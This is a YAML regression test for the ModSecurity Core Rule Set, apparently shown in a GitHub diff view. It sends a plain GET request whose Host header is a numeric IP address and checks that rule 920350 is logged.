input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "1.2.3.4"
protocol: "http"
uri: "/"
output:
log_contains: "id \"920350\""

Some files were not shown because too many files have changed in this diff Show more